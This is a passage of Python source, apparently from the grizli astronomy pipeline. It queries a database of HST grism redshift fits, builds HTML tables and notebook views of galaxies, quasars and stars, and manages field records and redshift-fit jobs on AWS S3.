    res = grizli_db.make_html_table(engine=engine, columns=['mtime', 'root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 't_g102', 't_g141', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'q_z', 'h_zphot', 'h_src', 'h_dr'], where="AND status > 4 AND phot_root = h_root AND id = h_id AND h_dr < 1", tables=['highz_2015'], table_root='highz', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'], show_hist=True)

    # z_spec with dz
    res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'z_spec_src', 'bic_diff', 'chinu', 'log_pdf_max', 'zwidth1/(1+z_map) as zw1', '(z_map-z_spec)/(1+z_spec) as dz', 'dlinesn'], where="AND status > 4 AND z_spec > 0 AND z_spec_qual = 1", table_root='zspec_delta', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])

    # Point sources
    res = grizli_db.make_html_table(engine=engine, columns=['root', 'id', 'red_bit', 'status', 'p_ra', 'p_dec', 't_g800l', 't_g102', 't_g141', 'mag_auto', 'flux_radius', 'z_map', 'z_spec', 'z_spec_src', 'z_spec_dr', 'bic_diff', 'chinu', 'log_pdf_max', 'q_z', 'zwidth1/(1+z_map) as zw1', 'dlinesn'], where="AND status > 4 AND mag_auto < 24 AND flux_radius < 1.9 AND ((flux_radius < 1.5 AND flux_radius > 0.75 AND red_bit > 32) OR (flux_radius < 1.9 AND flux_radius > 1.0 AND red_bit < 32))", table_root='point_sources', sync='s3://grizli-v1/tables/', png_ext=['stack', 'line', 'full', 'qso.full', 'star'], get_sql=False)

    # Reliable redshifts
    res = grizli_db.make_html_table(engine=engine, columns=['root', 'id', 'status', 'p_ra', 'p_dec', 't_g800l', 't_g102', 't_g141', 'mag_auto', 'flux_radius', '(flux_radius < 1.7 AND ((flux_radius < 1.4 AND flux_radius > 0.75 AND red_bit > 32) OR (flux_radius < 1.7 AND flux_radius > 1.0 AND red_bit < 32)))::int as is_point', 'z_map', 'z_spec', 'z_spec_src', 'z_spec_dr', 'sn_siii', 'sn_ha', 'sn_oiii', 'sn_oii', 'ew50_ha', 'd4000', 'd4000_e', 'bic_diff', 'chinu', 'log_pdf_max', 'q_z', 'zwidth1/(1+z_map) as zw1', 'dlinesn'], where="AND status > 4 AND chinu < 30 AND q_z > -0.7 order by q_z", table_root='reliable_redshifts', sync='s3://grizli-v1/tables/', png_ext=['stack', 'line', 'full'], get_sql=False, sort_column=('q_z', -1))

    # stellar classification?
    # sql = """SELECT root, id, ra, dec, status, z_map, q_z_map, bic_diff,
    #                 bic_diff_star,
    #                 chinu as t_chinu, s_chinu, q_chinu,
    #                 chinu - q_chinu as tq_chinu, q_chinu - s_chinu as qs_chinu,
    #                 chinu - s_chinu as ts_chinu, stellar_template
    #          FROM redshift_fit,
    #          (SELECT root as s_root, id as s_id, chinu as s_chinu, bic_diff_star,
    #                  stellar_template
    #           FROM stellar_fit
    #           WHERE status = 6
    #          ) as s,
    #          (SELECT root as q_root, id as q_id, chinu as q_chinu,
    #                  bic_diff as q_bic_diff, z_map as q_z_map
    #           FROM redshift_fit_quasar
    #           WHERE status = 6
    #          ) as q
    #          WHERE (root = s_root AND id = s_id) AND (root = q_root AND id = q_id)
    #       """

    #res = grizli_db.make_html_table(engine=engine, res=cstar, table_root='carbon_stars', sync='s3://grizli-v1/tables/', png_ext=['stack','line', 'full', 'qso.full', 'star'], sort_column=('bic_diff_star', -1), get_sql=False)

    # Combined galaxy / quasar / stellar fit comparison
    sql = """SELECT root, id, status, ra, dec, t_g800l, t_g102, t_g141,
                z_map, q_z_map, bic_diff,
                bic_diff_star, (bic_diff_star > 10 AND q_chinu < 20 AND chinu - q_chinu > 0.05 AND q_chinu-s_chinu > 0 AND chinu-s_chinu > 0.1)::int as is_star,
                chinu as t_chinu, s_chinu, q_chinu,
                bic_qso-bic_gal as bic_gq,
                bic_gal-bic_star as bic_gs,
                bic_qso-bic_star as bic_qs,
                (bic_spl+chimin)-bic_gal as bic_gx,
                bic_spl_qso-bic_qso as bic_qx,
                q_vel_bl, qso_q_z, qso_zw1, stellar_template
             FROM (SELECT *, bic_temp+chimin as bic_gal FROM redshift_fit z,
                (SELECT root as q_root, id as q_id, chinu as q_chinu,
                        bic_diff as q_bic_diff, bic_temp+chimin as bic_qso,
                        bic_spl+chimin as bic_spl_qso,
                        z_map as qso_z_map,
                        zwidth1/(1+z_map) as qso_zw1, vel_bl as q_vel_bl,
                        q_z as qso_q_z
                 FROM redshift_fit_quasar
                 WHERE status = 6
                ) q
             WHERE (root = q_root AND id = q_id)) c
             LEFT JOIN
                (SELECT root as s_root, id as s_id, chinu as s_chinu,
                        LN(dof)*nk+chi2 as bic_star,
                        LN(dof)*(nk-1)+chi2_flat as bic_spline,
                        bic_diff_star,
                        stellar_template
                 FROM stellar_fit
                 WHERE status = 6
                ) s ON (root = s_root AND id = s_id) WHERE chinu-q_chinu > 0.5
          """

    cstar = grizli_db.from_sql(sql, engine)
    # Rows with no stellar fit are masked; use -1 as the sentinel
    cstar['is_star'] = cstar['is_star'].filled(-1)

    print('N={0}'.format(len(cstar)))

    res = grizli_db.make_html_table(engine=engine, res=cstar, table_root='quasars_and_stars', sync='s3://grizli-v1/tables/', png_ext=['stack', 'line', 'full', 'qso.full', 'star'], sort_column=('bic_diff_star', -1), get_sql=False)

    # best-fit as quasar
    sql = """SELECT root, id, ra, dec, status, z_map, q_z_map,
                q_z, bic_diff, q_bic_diff,
                chinu as t_chinu, q_chinu,
                chinu - q_chinu as tq_chinu,
                (q_bic_temp + q_chimin) - (bic_temp + chimin) as bic_diff_quasar,
                q_vel_bl
             FROM redshift_fit z JOIN
                (SELECT root as q_root, id as q_id, chinu as q_chinu,
                        bic_diff as q_bic_diff, z_map as q_z_map, vel_bl,
                        chimin as q_chimin, bic_temp as q_bic_temp, vel_bl as q_vel_bl
                 FROM redshift_fit_quasar
                 WHERE status = 6
                ) as q
             WHERE (root = q_root AND id = q_id) AND status = 6 AND q_z > -1
          """

    qq = grizli_db.from_sql(sql, engine)

    res = grizli_db.make_html_table(engine=engine, res=qq, table_root='quasar_fit', sync='s3://grizli-v1/tables/', png_ext=['stack', 'line', 'full', 'qso.full', 'star'], get_sql=False)

    # Strong lines
    res = grizli_db.make_html_table(engine=engine, columns=['root', 'id', 'red_bit', 'status', 'p_ra', 'p_dec', 't_g800l', 't_g102', 't_g141', 'mag_auto', 'flux_radius', 'z_map', 'z_spec', 'z_spec_src', 'z_spec_dr', 'bic_diff', 'chinu', 'log_pdf_max', 'q_z', 'zwidth1/(1+z_map) as zw1', 'dlinesn', 'sn_ha', 'sn_oiii', 'sn_oii'], where="AND status > 4 AND mag_auto < 24 AND (sn_ha > 10 OR sn_oiii > 10 OR sn_oii > 10) AND flux_radius >= 1.6", table_root='strong_lines', sync='s3://grizli-v1/tables/', png_ext=['stack', 'full', 'qso.full', 'star'])

    # brown dwarf?
    tablename = 'spec1d_r30_g141'
    wave = pd.read_sql_query("SELECT * from {0}_wave".format(tablename),
                             engine)[tablename+'_wave'].values

    # Array indices bracketing spectral features at
    # 1.15, 1.25, 1.4
    i0 = 25, 28, 29, 32

    res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_map', 'z_spec', 'z_spec_src', 'bic_diff', 'chinu', 'log_pdf_max', 'q_z', 'zwidth1/(1+z_map) as zw1', 'dlinesn', '{0}_flux[25]/{0}_flux[28] as c1'.format(tablename), '{0}_flux[32]/{0}_flux[28] as c2'.format(tablename)], where="AND status > 4 AND flux_radius < 2 AND flux_radius > 1 AND mag_auto < 25 AND {0}_root = root AND {0}_id = id AND {0}_flux[28] > 0 AND {0}_flux[28]/{0}_err[28] > 5 AND {0}_flux[32] > 0 AND {0}_flux[25] > 0 AND {0}_flux[32]/{0}_flux[28] < 0.5".format(tablename), tables=[tablename], table_root='point_sources_colors', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])

    res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_map', 'z_spec', 'z_spec_src', 'bic_diff', 'chinu', 'log_pdf_max', 'q_z', 'zwidth1/(1+z_map) as zw1', 'dlinesn', '{0}_flux[25] as c25'.format(tablename), '{0}_flux[32] as c32'.format(tablename)], where="AND status > 4 AND z_spec = 0".format(tablename), tables=[tablename], table_root='point_sources_colors', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])

    # with line ratios
    lstr = 'err_{0} > 0 AND err_{0} < 5e-17'
    err_lines = ' AND '.join(lstr.format(li) for li in
                             ['hb', 'oiii', 'ha', 'sii'])

    res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'z_spec_src', 'bic_diff', 'chinu', 'log_pdf_max', 'zwidth1/(1+z_map) as zw1', '(z_map-z_spec)/(1+z_spec) as dz', 'dlinesn', 'flux_hb/flux_ha as HbHa', 'flux_hb/flux_oiii as HbO3', 'flux_oiii/flux_ha as O3Ha'], where="AND status > 4 AND z_spec > 0 AND z_spec_qual = 1 AND sn_oiii > 3 AND sn_ha > 2 AND {0}".format(err_lines), table_root='zspec_lines', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])

    if False:
        # z_map vs z_spec comparison figure in log(1+z), colored by
        # redshift-width
        from matplotlib.ticker import FixedLocator, AutoLocator, MaxNLocator
        import matplotlib.pyplot as plt

        xti = xt = np.arange(0, 3.6, 0.5)
        loc = np.arange(0, 3.6, 0.1)
        bins = utils.log_zgrid([0.03, 3.5], 0.01)

        fig = plt.figure(figsize=[7, 6])
        ax = fig.add_subplot(111)
        ax.scatter(np.log(1+res['z_spec']), np.log(1+res['z_map']), alpha=0.2, c=np.log10(res['zw1']), marker='.', vmin=-3.5, vmax=-0.5, cmap='plasma')

        # Invisible point just to create the colorbar mappable
        sc = ax.scatter(np.log([1]), np.log([1]), alpha=0.8, c=[0], marker='.', vmin=-3.5, vmax=-0.5, cmap='plasma')

        cb = plt.colorbar(sc, shrink=0.6)
        cb.set_label(r'$(z_{84}-z_{16})/(1+z_{50})$')
        cb.set_ticks([-3, -2, -1])
        cb.set_ticklabels([0.001, 0.01, 0.1])

        xts = ax.set_xticks(np.log(1+xt))
        xtl = ax.set_xticklabels(xti)
        xts = ax.set_yticks(np.log(1+xt))
        xtl = ax.set_yticklabels(xti)

        ax.set_xlim(0, np.log(1+3.5))
        ax.set_ylim(0, np.log(1+3.5))

        ax.xaxis.set_minor_locator(FixedLocator(np.log(1+loc)))
        ax.yaxis.set_minor_locator(FixedLocator(np.log(1+loc)))

        ax.set_xlabel('z_spec')
        ax.set_ylabel('z_MAP')
        ax.set_aspect(1)
        ax.grid()
        ax.text(0.95, 0.05, r'$N={0}$'.format(len(res)), ha='right', va='bottom', transform=ax.transAxes)
        ax.plot(ax.get_xlim(), ax.get_xlim(), color='k', alpha=0.2, linewidth=1, zorder=-10)

        fig.tight_layout(pad=0.1)
        fig.savefig('grizli_v1_literature_zspec.pdf')

    # COSMOS test
    root = 'cos-grism-j100012p0210'
    res = grizli_db.make_html_table(engine=engine, columns=['mtime', 'root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 't_g102', 't_g141', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'zwidth1/(1+z_map) as zw1', 'dlinesn'], where="AND status > 4 AND bic_diff > 100 AND root = '{0}'".format(root), table_root=root, sync='s3://grizli-v1/Pipeline/{0}/Extractions/'.format(root), png_ext=['R30', 'stack', 'full', 'line'], show_hist=True)

    # high bic_diff = unambiguous
    res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'd4000', 'd4000_e', '-(bic_temp-bic_spl) as bic_diff_spl'], where="AND status > 5 AND (((bic_diff > 50 OR zwidth1/(1+z_map) < 0.01) AND chinu < 2))", table_root='unamb', sync='s3://grizli-v1/tables/')

    # with d4000
    res = make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'd4000', 'd4000_e'], where="AND status > 5 AND chinu < 3 AND d4000 > 1 AND d4000 < 5 AND d4000_e > 0 AND d4000_e < 0.25 AND bic_diff > 5", table_root='d4000', sync='s3://grizli-v1/tables/')

    # LBG?
    res = grizli_db.make_html_table(engine=engine, columns=['mtime', 'root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', '-(bic_temp-bic_spl) as bic_diff_spl', 'splf01/splf02 as r12', 'splf02/splf03 as r23', 'splf02/sple02 as sn02'], where="AND status > 5 AND mag_auto > 23 AND bic_diff > -50 AND splf01/splf02 < 0.3 AND splf02/sple02 > 2 AND splf01 != 0 AND splf02 != 0 AND splf03 != 0 ".format(root), table_root='lbg_g800l', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])

    # stars?
    res = make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max'], where="AND status > 5 AND bic_diff > 100 AND chinu < 1.5 AND mag_auto < 24 AND sn_Ha > 20", table_root='star', sync='s3://grizli-v1/tables/')

    # By root
    root = 'j001420m3030'
    res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max'], where="AND status > 5 AND root = '{0}' AND bic_diff > 5".format(root), table_root=root+'-fit', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])

    # G800L spec-zs
    res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', '(z_map-z_spec)/(1+z_spec) as delta_z'], where="AND status > 5 AND z_spec > 0 AND z_spec_qual = 1 AND t_g800l > 0", table_root='zspec_g800l', sync='s3://grizli-v1/tables/')

    # Large G800L likely mismatch [OIII]/Ha
    res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'a_image', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'err_ha', 'ew50_oiii/(1+z_map) as ew_oiii_rest', 'sn_oiii'], where="AND status > 5 AND t_g800l > 0 AND sn_oiii > 3 AND mag_auto < 23 AND bic_diff > 5", table_root='g800l_oiii_mismatch', sync='s3://grizli-v1/tables/')

    # Potential Ly-a?
    res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'a_image', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'err_ha', 'ew50_oiii/(1+z_map) as ew_oiii_rest', 'sn_oiii'], where="AND status > 5 AND t_g800l > 0 AND sn_oiii > 5 AND sn_ha > 0 AND flux_oiii/flux_ha > 1.8", table_root='g800l_oiii_mismatch', sync='s3://grizli-v1/tables/')

    # Continuum resid
    res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', '23.9-2.5*log(splf01*8140*8140/3.e18*1.e29)-mag_auto as dmag'], where="AND status > 5 AND bic_diff > 5 AND splf01 > 0 AND bic_diff > 50".format(root), table_root='xxx', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])

    res = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'a_image', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'err_ha', 'sn_oiii', 'f814w_tot_1*3.e18/8140/8140/splf01*1.e-29 as fresid', 'splf01/sple01 as sn01', '23.9-2.5*log(splf01*8140*8140/3.e18*1.e29)-mag_auto as dmag'], where="AND status > 5 AND t_g800l > 0 AND f814w_tot_1 > 0 AND splf01 != 0 AND splf01/sple01 > 1 AND f814w_tot_1*3.e18/8140/8140/splf01*1.e-29 > 0 AND (f814w_tot_1*3.e18/8140/8140/splf01*1.e-29 < 0.3 OR f814w_tot_1*3.e18/8140/8140/splf01*1.e-29 > 4)", table_root='g800l_oiii_mismatch', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'])

    sql = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'a_image', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'err_ha', 'sn_oiii', 'splf01', 'sple01', 'f814w_tot_1', 'f850lp_tot_1', 'flux_auto/flux_iso as flux_aper_corr', '23.9-2.5*log(splf01*8140*8140/3.e18*1.e29)-mag_auto as dmag'], where="AND status > 5 AND t_g800l > 0 AND splf01 > 0", table_root='g800l_oiii_mismatch', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'], get_sql=True)

    res = pd.read_sql_query(sql, engine)
    # Synthetic AB mag from the 8140A spline flux coefficient
    splmag = 23.9-2.5*np.log10(np.maximum(res['splf01'], 1.e-22)*8140**2/3.e18*1.e29)

    sql = grizli_db.make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'a_image', 'flux_radius', 't_g800l', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max', 'err_ha', 'sn_oiii', 'splf03', 'sple03', 'f140w_tot_1', 'f160w_tot_1', 'flux_auto/flux_iso as flux_aper_corr'], where="AND status > 5 AND t_g141 > 0 AND sple03 > 0", table_root='g800l_oiii_mismatch', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'], get_sql=True)

    res = pd.read_sql_query(sql, engine)
    splmag = 23.9-2.5*np.log10(np.maximum(res['splf03'], 1.e-22)*1.2e4**2/3.e18*1.e29)

    # Number of matches per field
    counts = pd.read_sql_query("select root, COUNT(root) as n from redshift_fit, photometry_apcorr where phot_root = p_root AND id = p_id AND bic_diff > 50 AND mag_auto < 24 group by root;", engine)
def from_sql(query, engine, **kwargs):
    """
    Run an SQL query and return the result as a `~grizli.utils.GTable`.

    Parameters
    ----------
    query : str
        SQL query string.

    engine : `sqlalchemy` engine
        Database connection.

    kwargs : dict
        Additional keyword arguments passed to `set_column_formats`.

    Returns
    -------
    tab : `~grizli.utils.GTable`
        Query result with display formats applied to the columns.
    """
    import pandas as pd
    from grizli import utils

    df = pd.read_sql_query(query, engine)
    tab = utils.GTable.from_pandas(df)
    set_column_formats(tab, **kwargs)

    return tab
def render_for_notebook(tab, image_extensions=['stack', 'full', 'line'], bucket='grizli-v1', max_rows=20, link_root=True, link_type='grism'):
    """
    Render images for inline display in a notebook

    In [1]: from IPython.display import HTML
    In [2]: HTML(tab)

    Parameters
    ----------
    tab : table-like
        Catalog with at least ``root`` and ``id`` columns (and ``ra``/``dec``
        for the archive-query link types).

    image_extensions : list
        PNG cutout extensions to render as inline image columns.

    bucket : str
        Default S3 bucket; rows with roots starting with 'cos-g' are
        redirected to 'grizli-cosmos-v2'.

    max_rows : int
        Only the first `max_rows` rows are rendered.

    link_root, link_type : bool, str
        If `link_root`, turn the root (or an ``xroot`` combination with
        id/position) into a hyperlink of the requested type.

    Returns
    -------
    out : str
        HTML string of the rendered table.
    """
    import pandas as pd
    from eazy import utils as eu

    # ``None`` means "never truncate cell contents".  The old ``-1``
    # sentinel was deprecated in pandas 1.0 and raises in later versions.
    pd.set_option('display.max_colwidth', None)

    rows = tab[:max_rows].copy()

    # Per-row bucket: COSMOS grism fields live in a separate bucket
    buckets = [bucket]*len(rows)
    for i, r in enumerate(rows['root']):
        if r.startswith('cos-g'):
            buckets[i] = 'grizli-cosmos-v2'

    rows['bucket'] = buckets
    rows['ext'] = 'longstring'  # placeholder longer than any real extension
    s3url = 'https://s3.amazonaws.com/{bucket}/Pipeline/{root}/Extractions/{root}_{id:05d}.{ext}.png'

    def href_root(root):
        # Link a root name to its field summary HTML page
        if root.startswith('cos-g'):
            bucket_i = 'grizli-cosmos-v2'
        else:
            bucket_i = bucket

        s3 = 'https://s3.amazonaws.com/'+bucket_i+'/Pipeline/{0}/Extractions/{0}.html'
        return '<a href={0}>{1}</a>'.format(s3.format(root), root)

    def path_to_image_html(path):
        # Render an image URL as a clickable inline <img> tag
        return '<a href={0}><img src="{0}"/></a>'.format(path)

    # link for root
    fmt = {}
    cols = list(rows.colnames)
    if link_root:
        if link_type == 'grism':
            fmt = {'root': href_root}
        elif (link_type in ['cds','eso','alma','mast']) & ('ra' in cols):
            funcs = {'cds':eu.cds_query,
                     'eso':eu.eso_query,
                     'alma':eu.alma_query,
                     'mast':eu.mast_query}

            # Build links from the *truncated* ``rows``; the original code
            # used the full ``tab`` here, which broke the column assignment
            # below whenever len(tab) > max_rows
            urls = [funcs[link_type](ra, dec)
                    for ra, dec in zip(rows['ra'], rows['dec'])]

            href = [f'<a href="{u}"> {r} {i} </a>'
                    for u, r, i in zip(urls, rows['root'], rows['id'])]

            rows['xroot'] = href
            cols = ['xroot'] + cols
            for c in ['root','id','ra','dec']:
                cols.pop(cols.index(c))

    # One URL column per requested image extension
    for ext in image_extensions:
        rows['ext'] = ext
        urls = [s3url.format(**row) for row in rows.to_pandas().to_dict(orient='records')]
        rows[ext] = urls
        fmt[ext] = path_to_image_html
        cols.append(ext)

    # Helper columns no longer needed once the URLs are built
    rows.remove_columns(['bucket', 'ext'])
    for c in ['bucket','ext']:
        cols.pop(cols.index(c))

    out = rows[cols].to_pandas().to_html(escape=False, formatters=fmt)
    return out
def add_to_charge():
    """
    Insert rows into ``charge_fields`` for any photometry root that does
    not yet have an entry.

    New fields get the comment 'CANDELS', except j214224m4420 which is
    tagged 'Rafelski UltraDeep'.
    """
    # pandas was not imported in the original function body (only at the
    # module level of other helpers), causing a NameError at pd.DataFrame()
    import pandas as pd

    from grizli.aws import db

    engine = db.get_db_engine()

    p = db.from_sql('select distinct p_root from photometry_apcorr', engine)
    f = db.from_sql('select distinct field_root from charge_fields', engine)

    new_fields = []
    for root in p['p_root']:
        if root not in f['field_root']:
            print(root)
            new_fields.append(root)

    df = pd.DataFrame()
    df['field_root'] = new_fields
    df['comment'] = 'CANDELS'

    # Use .loc rather than chained assignment, which pandas may apply to a
    # temporary copy instead of the frame itself
    ix = df['field_root'] == 'j214224m4420'
    df.loc[ix, 'comment'] = 'Rafelski UltraDeep'

    df.to_sql('charge_fields', engine, index=False, if_exists='append', method='multi')
def add_by_footprint(footprint_file='j141156p3415_footprint.fits', engine=None):
    """
    Insert a single field into ``charge_fields`` from a footprint file.

    Returns False without inserting anything if the field is already in
    the table.
    """
    import pandas as pd
    from grizli.aws import db

    ## By footprint
    if engine is None:
        engine = db.get_db_engine()

    #ch = pd.read_sql_query('select * from charge_fields', engine)
    existing = pd.read_sql_query('select distinct field_root from charge_fields', engine)

    fp = utils.read_catalog(footprint_file)
    root = fp.meta['NAME']

    if root in existing['field_root'].tolist():
        print(f'Field found: {root}')
        return False

    df = pd.DataFrame()
    df['field_root'] = [root]
    df['comment'] = 'manual'

    # Bounding box from the footprint header keywords
    for key in ['xmin', 'xmax', 'ymin', 'ymax']:
        df[f'field_{key}'] = fp.meta[key.upper()]

    # Field center and Galactic extinction
    df['field_ra'] = np.mean(fp['ra'])
    df['field_dec'] = np.mean(fp['dec'])
    df['mw_ebv'] = fp.meta['MW_EBV']

    fp.rename_column('filter', 'filters')
    for k in ['filters', 'target', 'proposal_id']:
        df[k] = ' '.join([t for t in np.unique(fp[k])])

    #df['proposal_id'] = ' '.join([t for t in np.unique(fp['target'])])
    print(f'Send {root} to db.charge_fields')
    df.to_sql('charge_fields', engine, index=False, if_exists='append', method='multi')
def update_charge_fields(engine=None):
    """
    Refresh ``charge_fields``: ingest new footprint files from the working
    directory and update the pipeline ``log`` status column from the S3
    Start/Failed/Finished log listings.

    Parameters
    ----------
    engine : `sqlalchemy` engine, optional
        Database connection; created if not provided.  (The original
        version referenced an ``engine`` name that was never defined in
        the function scope.)
    """
    from grizli.aws import db

    if engine is None:
        engine = db.get_db_engine()

    # Ingest any footprints found locally that aren't in the table yet
    files = [f.replace('.png', '.fits') for f in glob.glob('j*footprint.png')]
    files.sort()
    for file in files:
        db.add_by_footprint(file, engine=engine)

    gtab = db.from_sql('select field_root, log from charge_fields', engine)
    bucket = 'grizli-v1'

    # Later status directories overwrite earlier ones, so 'Finished'
    # takes precedence over 'Failed' over 'Start'
    for status_dir in ['Start', 'Failed', 'Finished']:
        print(status_dir)
        os.system('aws s3 ls s3://{0}/Pipeline/Log/{1}/ | sed "s/.log//" > /tmp/{1}'.format(bucket, status_dir))
        fin = utils.read_catalog(f'/tmp/{status_dir}', format='ascii')
        print('{0} {1}'.format(status_dir, len(fin)))

        for i, r in enumerate(fin['col4']):
            ix = gtab['field_root'] == r
            if ix.sum() > 0:
                gtab['log'][ix] = '{0} {1}-{2}'.format(status_dir, fin['col1'][i], fin['col2'][i])

    # update the table: stage the non-masked logs in a temporary table and
    # merge with a single UPDATE ... FROM statement
    df = gtab[~gtab['log'].mask].to_pandas()
    df.to_sql('log_tmp', engine, index=False, if_exists='replace', method='multi')

    sql = "UPDATE charge_fields ch SET log = tmp.log FROM log_tmp tmp WHERE tmp.field_root = ch.field_root"
    engine.execute(sql)
def overview_table():
    """
    Generate a new overview table with the redshift histograms
    """
    from grizli.aws import db as grizli_db
    import pandas as pd
    from grizli import utils

    engine = grizli_db.get_db_engine()

    ch = from_sql("select * from charge_fields", engine)

    by_mag = from_sql("select p_root as root, COUNT(p_root) as nmag from photometry_apcorr where mag_auto < 24 group by p_root;", engine)
    by_nz = from_sql("select root, COUNT(root) as nz from redshift_fit where bic_diff > 30 group by root;", engine)

    # Fold the per-field counts into the charge table; -1 marks fields
    # with no matching rows in the count query
    for count in (by_mag, by_nz):
        new_col = count.colnames[1]
        ch[new_col] = -1

        lookup = dict(zip(count['root'], count[new_col]))
        for j, field in enumerate(ch['field_root']):
            if field in lookup:
                ch[new_col][j] = lookup[field]

    # Redshift-histogram thumbnails linked to the field summary pages
    zhist = [f'https://s3.amazonaws.com/grizli-v1/Pipeline/{r}/Extractions/{r}_zhist.png'
             for r in ch['field_root']]
    ch['zhist'] = ['<a href="{1}"><img src={0} height=300px></a>'.format(zh, zh.replace('_zhist.png', '.html'))
                   for zh in zhist]

    cols = ['field_root', 'field_ra', 'field_dec', 'mw_ebv', 'gaia5', 'nassoc', 'nfilt', 'filter', 'target', 'comment', 'proposal_id', 'proposal_pi', 'field_t_g800l', 'field_t_g102', 'field_t_g141', 'mast', 'footprint', 'rgb', 'nmag', 'nz', 'zhist', 'summary', 'log']

    # Only non-string columns get sort controls
    sortable = [c for c in cols if not hasattr(ch[c][0], 'upper')]

    # https://s3.amazonaws.com/grizli-v1/Master/CHArGE-July2019.html
    table_root = 'CHArGE-July2019.zhist'
    ch[cols].write_sortable_html('{0}.html'.format(table_root), replace_braces=True, localhost=False, max_lines=1e5, table_id=None, table_class='display compact', css=None, filter_columns=sortable, buttons=['csv'], toggle=True, use_json=True)

    os.system('aws s3 sync ./ s3://grizli-v1/Master/ --exclude "*" --include "{1}.html" --include "{1}.json" --acl public-read'.format('', table_root))
def run_all_redshift_fits():
    """
    Launch lambda redshift fits for every charge field with grism data
    that doesn't already have rows in ``redshift_fit``.

    The maximum redshift of each fit is set by the reddest grism
    available for the field (G800L < G102 < G141).
    """
    ##############
    # Run all
    from grizli.aws import db as grizli_db
    import pandas as pd

    engine = grizli_db.get_db_engine()

    # By grism: finished fields with any grism exposure time
    res = pd.read_sql_query("select field_root, field_t_g800l, field_t_g102, field_t_g141, proposal_pi from charge_fields where (nassoc < 200 AND (field_t_g800l > 0 OR field_t_g141 > 0 OR field_t_g102 > 0) AND log LIKE '%%inish%%');", engine)
    orig_roots = pd.read_sql_query('select distinct root from redshift_fit', engine)['root'].tolist()

    count = 0
    for i, (root, ta, tb, tr, pi) in enumerate(zip(res['field_root'], res['field_t_g800l'], res['field_t_g102'], res['field_t_g141'], res['proposal_pi'])):
        # Skip fields that already have fit results
        if root in orig_roots:
            continue

        count += 1

        # zmax follows the reddest grism: 1.6 (G800L), 2.2 (G102), 3.2 (G141)
        zmax = 1.6
        if tb > 0:
            zmax = 2.2

        if tr > 0:
            zmax = 3.2

        print('\n\n', i, count, root, ta, tb, tr, pi, zmax, '\n\n')

        phot_root = None

        try:
            grizli_db.run_lambda_fits(root, phot_root=phot_root,
                                      min_status=6, zr=[0.01, zmax])
        except:
            # NOTE(review): bare except silently swallows all failures,
            # including KeyboardInterrupt -- confirm this is intended
            pass

    ####
    # Redo fits on reprocessed fields
    # for i in range(2,11):
    # root = 'j214224m4420gr{0:02d}'.format(i)
    # print(root)
    #
    # NOTE(review): everything below is interactive scratch code.  It relies
